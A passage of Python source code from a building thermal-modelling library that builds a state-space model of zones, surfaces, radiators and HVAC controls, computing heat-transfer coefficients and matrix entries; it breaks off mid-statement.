output_maximum_timeseries: pd.DataFrame
def __init__(
self,
scenario_name: str,
timestep_start=None,
timestep_end=None,
timestep_interval=None,
connect_electric_grid=True,
connect_thermal_grid_cooling=False,
connect_thermal_grid_heating=False,
with_validation_outputs=False
):
# Store scenario name.
self.scenario_name = scenario_name
# Obtain building data.
building_data = (
cobmo.data_interface.BuildingData(
self.scenario_name,
timestep_start=timestep_start,
timestep_end=timestep_end,
timestep_interval=timestep_interval
)
)
# Store building data.
self.building_data = building_data
# Obtain total building zone area.
# - This is used for scaling air flow / power values to per-square-meter values.
self.zone_area_total = building_data.zones['zone_area'].sum()
# Define sets.
# State variables.
self.states = pd.Index(
pd.concat([
# Zone temperature.
building_data.zones['zone_name'] + '_temperature',
# Surface temperature.
building_data.surfaces_adiabatic['surface_name'][
building_data.surfaces_adiabatic['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_exterior['surface_name'][
building_data.surfaces_exterior['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_interior['surface_name'][
building_data.surfaces_interior['heat_capacity'] != 0.0
] + '_temperature',
# Zone CO2 concentration.
building_data.zones['zone_name'][
building_data.zones['fresh_air_flow_control_type'] == 'co2_based'
] + '_co2_concentration',
# Zone absolute humidity.
building_data.zones['zone_name'][
building_data.zones['humidity_control_type'] == 'humidity_based'
] + '_absolute_humidity',
# Radiator temperatures.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_water_mean_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_hull_front_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_hull_rear_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
& (building_data.zones['radiator_panel_number'] == '2')
] + '_radiator_panel_1_hull_rear_temperature',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
& (building_data.zones['radiator_panel_number'] == '2')
] + '_radiator_panel_2_hull_front_temperature',
# Storage state of charge.
pd.Series(['storage_state_of_charge']) if (
pd.notnull(building_data.scenarios.at['storage_type'])
) else None
]),
name='state_name'
)
# Control variables.
self.controls = pd.Index(
pd.concat([
# Electric / thermal grid connections and heating / cooling plants.
pd.Series([
'grid_electric_power',
'grid_thermal_power_cooling',
'grid_thermal_power_heating',
'plant_thermal_power_cooling',
'plant_thermal_power_heating'
]),
# Generic HVAC system.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_heat_thermal_power',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_cool_thermal_power',
# Radiator thermal power.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_thermal_power',
# AHU.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_cool_air_flow',
# TU.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_cool_air_flow',
# Vent.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_vent_type'])
] + '_vent_air_flow',
# Sensible storage cooling.
pd.Series([
'storage_charge_thermal_power_cooling',
'storage_discharge_thermal_power_cooling',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling'
) else None,
# Sensible storage heating.
pd.Series([
'storage_charge_thermal_power_heating',
'storage_discharge_thermal_power_heating',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating'
) else None,
# Battery storage.
pd.Series([
'storage_charge_electric_power',
'storage_discharge_electric_power'
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'battery'
) else None
]),
name='control_name'
)
# Disturbance variables.
self.disturbances = pd.Index(
pd.concat([
# Weather.
pd.Series([
'ambient_air_temperature',
'sky_temperature',
'irradiation_horizontal',
'irradiation_east',
'irradiation_south',
'irradiation_west',
'irradiation_north'
]),
# Internal gains.
pd.Series(
building_data.zones['internal_gain_type'].dropna().unique() + '_internal_gain_occupancy'
),
pd.Series(
building_data.zones['internal_gain_type'].dropna().unique() + '_internal_gain_appliances'
),
pd.Series(
building_data.zones['internal_gain_type'].dropna().unique() + '_warm_water_demand'
),
# Constant, series of ones (workaround for constant model terms).
pd.Series(['constant'])
]),
name='disturbance_name'
)
# Output variables.
self.outputs = pd.Index(
pd.concat([
# Electric / thermal grid connections and heating / cooling plants.
pd.Series([
'grid_electric_power',
'grid_thermal_power_cooling',
'grid_thermal_power_heating',
'plant_thermal_power_cooling',
'plant_thermal_power_heating'
]),
# Generic HVAC system controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_heat_thermal_power',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_generic_type'])
] + '_generic_cool_thermal_power',
# Radiator controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_radiator_type'])
] + '_radiator_thermal_power',
# AHU controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_ahu_type'])
] + '_ahu_cool_air_flow',
# TU controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_heat_air_flow',
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_tu_type'])
] + '_tu_cool_air_flow',
# Vent controls.
building_data.zones['zone_name'][
pd.notnull(building_data.zones['hvac_vent_type'])
] + '_vent_air_flow',
# Sensible storage cooling controls.
pd.Series([
'storage_charge_thermal_power_cooling',
'storage_discharge_thermal_power_cooling',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_cooling'
) else None,
# Sensible storage heating controls.
pd.Series([
'storage_charge_thermal_power_heating',
'storage_discharge_thermal_power_heating',
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating'
) else None,
# Battery storage controls.
pd.Series([
'storage_charge_electric_power',
'storage_discharge_electric_power'
]) if (
building_data.scenarios.at['storage_commodity_type'] == 'battery'
) else None,
# Storage state of charge.
pd.Series(['storage_state_of_charge']) if (
pd.notnull(building_data.scenarios.at['storage_type'])
) else None,
# Zone temperature.
building_data.zones['zone_name'] + '_temperature',
# Zone CO2 concentration.
building_data.zones['zone_name'][
building_data.zones['fresh_air_flow_control_type'] == 'co2_based'
] + '_co2_concentration',
# Zone absolute humidity.
building_data.zones['zone_name'][
building_data.zones['humidity_control_type'] == 'humidity_based'
] + '_absolute_humidity',
# Zone fresh air flow.
building_data.zones['zone_name'] + '_total_fresh_air_flow',
# Validation outputs.
pd.concat([
building_data.surfaces_adiabatic['surface_name'][
building_data.surfaces_adiabatic['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_exterior['surface_name'][
building_data.surfaces_exterior['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_interior['surface_name'][
building_data.surfaces_interior['heat_capacity'] != 0.0
] + '_temperature',
building_data.surfaces_exterior['surface_name'] + '_irradiation_gain_exterior',
building_data.surfaces_exterior['surface_name'] + '_convection_interior'
]) if with_validation_outputs else None,
# Power balances.
pd.Series([
'electric_power_balance',
'thermal_power_cooling_balance',
'thermal_power_heating_balance'
])
]),
name='output_name'
)
# Obtain timesteps.
self.timesteps = building_data.timesteps
self.timestep_interval = building_data.timestep_interval
# Instantiate state space model matrix constructors.
state_matrix = cobmo.utils.MatrixConstructor(index=self.states, columns=self.states)
control_matrix = cobmo.utils.MatrixConstructor(index=self.states, columns=self.controls)
disturbance_matrix = cobmo.utils.MatrixConstructor(index=self.states, columns=self.disturbances)
state_output_matrix = cobmo.utils.MatrixConstructor(index=self.outputs, columns=self.states)
control_output_matrix = cobmo.utils.MatrixConstructor(index=self.outputs, columns=self.controls)
disturbance_output_matrix = cobmo.utils.MatrixConstructor(index=self.outputs, columns=self.disturbances)
def define_initial_state():
"""Define initial value of the state vector for given definition in `initial_state_types`."""
# Instantiate.
self.state_vector_initial = (
pd.Series(
0.0,
index=self.states
)
)
# Zone air temperature.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(building_data.zones['zone_name'] + '_temperature')
] = (
building_data.scenarios.at['initial_zone_temperature']
)
# Surface temperature.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(
pd.concat([
building_data.surfaces_adiabatic['surface_name'] + '_temperature',
building_data.surfaces_exterior['surface_name'] + '_temperature',
building_data.surfaces_interior['surface_name'] + '_temperature'
])
)
] = (
building_data.scenarios.at['initial_surface_temperature']
)
# CO2 concentration.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(building_data.zones['zone_name'] + '_co2_concentration')
] = (
building_data.scenarios.at['initial_co2_concentration']
)
# Zone air absolute humidity.
self.state_vector_initial.loc[
self.state_vector_initial.index.isin(building_data.zones['zone_name'] + '_absolute_humidity')
] = (
building_data.scenarios.at['initial_absolute_humidity']
)
# Storage state of charge.
self.state_vector_initial.loc[
self.state_vector_initial.index.str.contains('storage_state_of_charge')
] = (
building_data.scenarios.at['initial_storage_state_of_charge']
)
def calculate_coefficients_zone():
"""Calculate zone parameters / heat transfer coefficients for use in, e.g., surface and radiator models."""
# Calculate zone air volume (equivalent to CO2 capacity).
building_data.zones['zone_volume'] = (
building_data.zones['zone_area']
* building_data.zones['zone_height']
)
# Calculate zone heat capacity (absolute heat capacity) from specific heat capacity.
building_data.zones['heat_capacity'] = (
building_data.zones['zone_volume']
* building_data.zones['heat_capacity']
)
# Calculate zone air mass (equivalent to moisture capacity).
building_data.zones['zone_air_mass'] = (
building_data.zones['zone_volume']
* building_data.parameters.at['density_air']
)
# Instantiate columns for parameters / heat transfer coefficients.
building_data.zones['zone_surfaces_wall_area'] = None
building_data.zones['zone_surfaces_window_area'] = None
building_data.zones['zone_surfaces_wall_emissivity'] = None
building_data.zones['zone_surfaces_window_emissivity'] = None
# Calculate zone parameters / heat transfer coefficients.
for zone_name, zone_data in building_data.zones.iterrows():
# Collect all surfaces adjacent to the zone.
zone_surfaces = (
pd.concat(
[
building_data.surfaces_exterior.loc[
building_data.surfaces_exterior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_name'].isin([zone_name]),
:
],
building_data.surfaces_interior.loc[
building_data.surfaces_interior['zone_adjacent_name'].isin([zone_name]),
:
],
building_data.surfaces_adiabatic.loc[
building_data.surfaces_adiabatic['zone_name'].isin([zone_name]),
:
]
],
sort=False
)
)
# Calculate parameters / heat transfer coefficients.
building_data.zones.at[zone_name, 'zone_surfaces_wall_area'] = (
(
zone_surfaces['surface_area']
* (1 - zone_surfaces['window_wall_ratio'])
).sum()
)
building_data.zones.at[zone_name, 'zone_surfaces_window_area'] = (
(
zone_surfaces['surface_area']
* zone_surfaces['window_wall_ratio']
).sum()
)
building_data.zones.at[zone_name, 'zone_surfaces_wall_emissivity'] = (
zone_surfaces['emissivity_surface'].mean()
)
# TODO: Ignore surfaces with no windows.
building_data.zones.at[zone_name, 'zone_surfaces_window_emissivity'] = (
zone_surfaces['emissivity_window'].mean()
)
def calculate_coefficients_surface():
"""Calculate heat transfer coefficients for the surface models."""
# Calculate absolute heat capacity from specific heat capacity.
building_data.surfaces_adiabatic['heat_capacity'] = (
building_data.surfaces_adiabatic['surface_area']
* building_data.surfaces_adiabatic['heat_capacity']
)
building_data.surfaces_exterior['heat_capacity'] = (
building_data.surfaces_exterior['surface_area']
* building_data.surfaces_exterior['heat_capacity']
)
building_data.surfaces_interior['heat_capacity'] = (
building_data.surfaces_interior['surface_area']
* building_data.surfaces_interior['heat_capacity']
)
# Instantiate columns for heat transfer coefficients.
building_data.surfaces_exterior['heat_transfer_coefficient_surface_sky'] = None
building_data.surfaces_exterior['heat_transfer_coefficient_surface_ground'] = None
building_data.surfaces_exterior['heat_transfer_coefficient_window_sky'] = None
building_data.surfaces_exterior['heat_transfer_coefficient_window_ground'] = None
# Calculate heat transfer coefficients.
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_surface_sky'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_surface']
* surface_data.at['sky_view_factor']
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_sky_temperature']
/ 2.0
+ 273.15
) ** 3
)
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_surface_ground'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_surface']
* (1.0 - surface_data.at['sky_view_factor'])
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_ambient_air_temperature']
/ 2.0
+ 273.15
) ** 3
)
if pd.notnull(surface_data.at['window_type']):
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_window_sky'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_window']
* surface_data.at['sky_view_factor']
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_sky_temperature']
/ 2.0
+ 273.15
) ** 3
)
building_data.surfaces_exterior.at[
surface_name,
'heat_transfer_coefficient_window_ground'
] = (
4.0
* building_data.parameters.at['stefan_boltzmann_constant']
* surface_data.at['emissivity_window']
* (1.0 - surface_data.at['sky_view_factor'])
* (
building_data.scenarios.at['linearization_exterior_surface_temperature']
/ 2.0
+ building_data.scenarios.at['linearization_ambient_air_temperature']
/ 2.0
+ 273.15
) ** 3
)
def calculate_coefficients_radiator():
"""Calculate heat transfer coefficients for the radiator model."""
if pd.notnull(building_data.zones['hvac_radiator_type']).any():
# Instantiate columns for heat transfer coefficients.
building_data.zones['heat_capacitance_hull'] = None
building_data.zones['thermal_resistance_radiator_hull_conduction'] = None
building_data.zones['thermal_resistance_radiator_front_zone'] = None
building_data.zones['thermal_resistance_radiator_front_surfaces'] = None
building_data.zones['thermal_resistance_radiator_front_zone_surfaces'] = None
building_data.zones['thermal_resistance_radiator_rear_zone'] = None
building_data.zones['thermal_resistance_radiator_rear_surfaces'] = None
building_data.zones['thermal_resistance_radiator_rear_zone_surfaces'] = None
# Instantiate additional columns for multi-panel radiators.
if (building_data.zones['radiator_panel_number'] == '2').any():
building_data.zones['thermal_resistance_radiator_panel_1_rear_zone'] = None
building_data.zones['thermal_resistance_radiator_panel_2_front_zone'] = None
# Calculate heat transfer coefficients.
for zone_name, zone_data in building_data.zones.iterrows():
if pd.notnull(zone_data.at['hvac_radiator_type']):
# Calculate geometric parameters and heat capacity.
thickness_water_layer = (
zone_data.at['radiator_water_volume']
/ zone_data.at['radiator_panel_area']
)
thickness_hull_layer = (
# Thickness for hull on one side of the panel.
0.5 * (
zone_data.at['radiator_panel_thickness']
- thickness_water_layer
)
)
radiator_hull_volume = (
# Volume for hull on one side of the panel.
thickness_hull_layer
* zone_data.at['radiator_panel_area']
)
building_data.zones.at[zone_name, 'heat_capacitance_hull'] = (
radiator_hull_volume
* zone_data.at['radiator_hull_heat_capacity']
)
building_data.zones.at[zone_name, 'heat_capacitance_water'] = (
zone_data.at['radiator_water_volume']
* building_data.parameters.at['water_specific_heat']
)
# Calculate fundamental thermal resistances.
thermal_resistance_conduction = (
thickness_hull_layer
/ (
zone_data.at['radiator_hull_conductivity']
* zone_data.at['radiator_panel_area']
)
)
thermal_resistance_convection = (
1.0
/ (
zone_data.at['radiator_convection_coefficient']
* zone_data.at['radiator_panel_area']
)
)
temperature_radiator_surfaces_mean = (
0.5
* (
0.5
* (
zone_data.at['radiator_supply_temperature_nominal']
+ zone_data.at['radiator_return_temperature_nominal']
)
+ building_data.scenarios.at['linearization_surface_temperature']
)
)
thermal_resistance_radiation_front = (
(
(1.0 / zone_data.at['radiator_panel_area'])
+ (
(1.0 - zone_data.at['radiator_emissivity'])
/ (
zone_data.at['radiator_panel_area']
* zone_data.at['radiator_emissivity']
)
)
+ (
# TODO: Use total zone surface area and emissivity?
(1.0 - zone_data.at['zone_surfaces_wall_emissivity'])
/ (
zone_data.at['zone_surfaces_wall_area']
* zone_data.at['zone_surfaces_wall_emissivity']
)
)
)
/ (
(
4.0 * building_data.parameters.at['stefan_boltzmann_constant']
* (temperature_radiator_surfaces_mean ** 3.0)
)
)
)
thermal_resistance_radiation_rear = (
(
(1.0 / zone_data.at['radiator_panel_area'])
+ (
(1.0 - zone_data.at['radiator_emissivity'])
/ (
zone_data.at['radiator_panel_area']
* zone_data.at['radiator_emissivity']
)
)
+ (
# TODO: Use total zone surface area and emissivity?
(1.0 - zone_data.at['zone_surfaces_wall_emissivity'])
/ (
zone_data.at['radiator_panel_area']
* zone_data.at['zone_surfaces_wall_emissivity']
)
)
)
/ (
(
4.0 * building_data.parameters.at['stefan_boltzmann_constant']
* (temperature_radiator_surfaces_mean ** 3.0)
)
)
)
thermal_resistance_star_sum_front = (
0.5 * thermal_resistance_conduction * thermal_resistance_convection
+ 0.5 * thermal_resistance_conduction * thermal_resistance_radiation_front
+ thermal_resistance_convection * thermal_resistance_radiation_front
)
thermal_resistance_star_sum_rear = (
0.5 * thermal_resistance_conduction * thermal_resistance_convection
+ 0.5 * thermal_resistance_conduction * thermal_resistance_radiation_rear
+ thermal_resistance_convection * thermal_resistance_radiation_rear
)
# Calculate transformed thermal resistances.
building_data.zones.at[zone_name, 'thermal_resistance_radiator_hull_conduction'] = (
thermal_resistance_conduction
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_front_zone'] = (
thermal_resistance_star_sum_front / thermal_resistance_radiation_front
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_front_surfaces'] = (
thermal_resistance_star_sum_front / thermal_resistance_convection
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_front_zone_surfaces'] = (
thermal_resistance_star_sum_front / (0.5 * thermal_resistance_conduction)
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_rear_zone'] = (
thermal_resistance_star_sum_rear / thermal_resistance_radiation_rear
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_rear_surfaces'] = (
thermal_resistance_star_sum_rear / thermal_resistance_convection
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_rear_zone_surfaces'] = (
thermal_resistance_star_sum_rear / (0.5 * thermal_resistance_conduction)
)
if (building_data.zones['radiator_panel_number'] == '2').any():
thermal_resistance_convection_fin = (
1.0
/ (
thermal_resistance_convection
* zone_data.at['radiator_fin_effectiveness']
)
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_panel_1_rear_zone'] = (
0.5 * thermal_resistance_conduction
+ thermal_resistance_convection
)
building_data.zones.at[zone_name, 'thermal_resistance_radiator_panel_2_front_zone'] = (
0.5 * thermal_resistance_conduction
+ thermal_resistance_convection_fin
)
def define_heat_transfer_surfaces_exterior():
"""Thermal model: Exterior surfaces"""
# TODO: Exterior window transmission factor
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Conductive heat transfer from the exterior towards the core of surface
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
disturbance_matrix[
f'{surface_name}_temperature',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
)
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
disturbance_matrix[
f'{surface_name}_temperature',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_surface_sky']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Conductive heat transfer from the interior towards the core of surface
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
f'{surface_name}_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
state_matrix[
f'{surface_name}_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ surface_data.at['heat_capacity']
)
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
f'{surface_name}_temperature'
] += (
surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
else: # Surfaces with neglected heat capacity
# Complete convective heat transfer from surface to zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
)
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_surface_sky']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
state_matrix[
surface_data.at['zone_name'] + '_temperature',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ building_data.zones.at[surface_data.at['zone_name'], 'zone_surfaces_wall_area']
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* surface_data.at['surface_area']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1))
/ building_data.zones.at[surface_data.at['zone_name'], 'heat_capacity']
)
# Windows for each exterior surface - Modelled as surfaces with neglected heat capacity
if surface_data.at['window_wall_ratio'] != 0.0:
# Complete convective heat transfer from surface to zone
disturbance_matrix[
surface_data.at['zone_name'] + '_temperature',
